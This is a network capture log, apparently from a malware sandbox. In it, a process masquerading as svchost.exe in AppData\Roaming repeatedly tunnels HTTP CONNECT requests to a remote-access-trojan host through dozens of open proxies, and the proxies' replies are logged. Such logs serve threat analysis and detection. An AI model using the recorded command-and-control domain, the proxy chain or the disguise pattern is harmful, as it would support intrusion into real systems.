Mar 9, 2024 13:14:35.798866987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3398	192.168.2.5	60322	14.160.26.105	19132	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.806924105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3399	192.168.2.5	60227	41.223.232.117	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.815968990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3400	192.168.2.5	60885	3.123.150.192	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.822482109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.133464098 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:35 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3401	192.168.2.5	60393	162.214.75.79	52163	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.825047016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.849267960 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3402	192.168.2.5	59651	192.252.220.92	17328	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.826968908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3403	192.168.2.5	60314	182.48.77.173	8674	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.827572107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.645961046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3404	192.168.2.5	60895	217.182.153.29	12000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.838150024 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.334114075 CET	131	IN	HTTP/1.1 503 Too many open connections Content-Type: text/plain Connection: close Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a Data Ascii: Maximum number of open connections reached.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3405	192.168.2.5	60897	91.189.177.186	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.843900919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.194312096 CET	1286	IN	HTTP/1.1 403 Forbidden Server: squid/5.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3628 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from lb1 X-Cache-Lookup: NONE from lb1:3128 Via: 1.1 lb1 (squid/5.7) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3406	192.168.2.5	60857	106.105.218.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.848514080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3407	192.168.2.5	60800	211.93.2.190	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.866332054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.358652115 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3408	192.168.2.5	59572	162.241.50.179	53755	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.877289057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3409	192.168.2.5	59545	198.12.255.193	22785	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.889045954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3410	192.168.2.5	60513	199.58.184.97	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.912493944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3411	192.168.2.5	60876	103.66.177.17	32251	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.922122002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.760879993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3412	192.168.2.5	60894	52.172.1.186	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.925997019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3413	192.168.2.5	60918	1.15.62.12	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.957685947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3414	192.168.2.5	56494	31.200.242.201	15755	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.957932949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3415	192.168.2.5	60374	18.167.191.223	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.957933903 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3416	192.168.2.5	58263	47.251.34.170	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.964687109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3417	192.168.2.5	59190	184.170.248.5	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.968281984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3418	192.168.2.5	56490	203.96.177.211	55005	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.973156929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3419	192.168.2.5	60725	111.53.178.249	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.978349924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3420	192.168.2.5	56503	62.176.12.111	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.996746063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3421	192.168.2.5	60745	180.250.159.49	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.000833988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.253869057 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3422	192.168.2.5	55427	101.255.165.130	1111	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.006418943 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.847940922 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3423	192.168.2.5	58299	195.235.124.143	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.008151054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3424	192.168.2.5	56491	193.239.56.84	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.010257006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3425	192.168.2.5	56825	162.240.231.211	60589	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.021218061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3426	192.168.2.5	60338	62.103.186.66	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.022974014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3427	192.168.2.5	56433	103.13.204.24	8082	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.025702000 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3428	192.168.2.5	60173	174.75.211.222	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.058125019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3429	192.168.2.5	60920	43.155.170.35	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.087496996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3430	192.168.2.5	56673	103.126.219.37	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.114518881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3431	192.168.2.5	60491	45.65.137.218	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.114871025 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.594254017 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3432	192.168.2.5	60941	172.67.255.224	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.115858078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.269961119 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3433	192.168.2.5	56886	147.124.212.31	24230	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.161000967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3434	192.168.2.5	60676	199.102.106.94	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.166007996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3435	192.168.2.5	56867	162.240.231.211	60415	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:36.167314053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3436	192.168.2.5	60505	107.148.201.157	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
